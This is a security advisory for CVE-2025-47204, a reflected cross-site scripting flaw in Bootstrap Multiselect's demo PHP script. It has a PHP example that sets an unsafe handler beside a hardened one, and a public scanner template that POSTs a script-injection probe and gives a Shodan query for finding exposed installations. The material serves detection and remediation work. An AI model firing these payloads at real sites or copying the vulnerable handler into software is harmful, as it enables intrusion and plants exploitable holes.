CVE-2025-47204: Bootstrap Multiselect <= 1.1.2 - Cross-Site Scripting

Date: 2025-08-01 | Affected software: Bootstrap Multiselect | PoC: public

Vulnerability description

A PHP script in the source code release echoes arbitrary POST data back into the response. If a developer adopts this structure wholesale in a live application, it creates a reflected Cross-Site Scripting (XSS) vulnerability that can be triggered through Cross-Site Request Forgery (CSRF), since the attacker only needs the victim's browser to submit a form to the script.
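To make the pattern concrete, here is an added illustration (not the project's own post.php, whose exact contents are not shown on this page): a handler that reflects POST fields into HTML verbatim, next to a hardened version that encodes every value for the HTML context and rejects POSTs lacking a session-bound anti-CSRF token. The field names, the token value and the probe input are constructed.

```php
<?php
// Added illustration, not Bootstrap Multiselect's shipped post.php.
// VULNERABLE: reflecting request data into HTML without encoding.
// Every POST field lands in the page as live markup, so a form on an
// attacker-controlled site can make the victim's browser submit script
// that then runs in this site's origin (reflected XSS reached via CSRF).
function render_unsafe(array $post): string
{
    $out = '<ul>';
    foreach ($post as $name => $value) {
        $out .= "<li>$name: $value</li>";
    }
    return $out . '</ul>';
}

// HARDENED: (1) encode each untrusted value for the HTML body context,
// quotes included, so "><script> stays inert text; (2) require a
// session-bound token so a cross-site form cannot trigger the handler;
// (3) per the advisory's remediation, demo handlers like this should not
// be deployed at all; only the css/js assets belong in production.
function esc(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function render_safe(array $post, string $sessionToken): ?string
{
    // Constant-time comparison against the token stored in the session;
    // the caller should answer 403 when null is returned.
    $sent = isset($post['csrf_token']) && is_string($post['csrf_token']) ? $post['csrf_token'] : '';
    if ($sent === '' || !hash_equals($sessionToken, $sent)) {
        return null;
    }
    unset($post['csrf_token']);
    $out = '<ul>';
    foreach ($post as $name => $value) {
        if (!is_scalar($value)) {
            continue; // nested arrays in $_POST are not rendered
        }
        $out .= '<li>' . esc((string) $name) . ': ' . esc((string) $value) . '</li>';
    }
    return $out . '</ul>';
}

// Constructed input mirroring the template's probe: the field carries markup.
$probe = ['canary' => '"><script>alert(document.domain)</script>'];
echo render_unsafe($probe), "\n";                                  // markup returned as-is
echo render_safe($probe + ['csrf_token' => 'demo-token'], 'demo-token'), "\n"; // markup encoded
var_dump(render_safe($probe, 'demo-token'));                       // NULL: no token, request refused
```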

PoC code [public]

id: CVE-2025-47204

info:
  name: Bootstrap Multiselect <= 1.1.2 - Cross-Site Scripting
  author: r3naissance
  severity: medium
  description: |
    A PHP script in the source code release echoes arbitrary POST data. If a developer adopts this structure wholesale in a live application, it could create a Reflective Cross-Site Scripting (XSS) vulnerability exploitable through Cross-Site Request Forgery (CSRF).
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application.
  remediation: |
    Only use the necessary components (css/js) in production applications
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2025-47204
  classification:
    epss-score: 0.01638
    epss-percentile: 0.81284
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"bootstrap-multiselect"
  tags: cve,cve2025,xss,bootstrap-multiselect,vkev

http:
  - raw:
      - |
        POST /bootstrap-multiselect/post.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        canary="><script>alert(document.domain)</script>

    matchers:
      - type: dsl
        dsl:
          - 'contains(content_type, "text/html")'
          - 'contains_all(body, "<script>alert(document.domain)</script>", "bootstrap-multiselect-master")'
        condition: and
# digest: 4a0a0047304502207ec4a25b732d23e665ecd62a47f43c9fe2cc2fce3d26ed1f852228311270cc3e022100db033d6ae57107eae61995ddf24b1e2e0b408250cdec1c60983f20b3eb8f1725:922c64590222798bb761d5b6d8e72950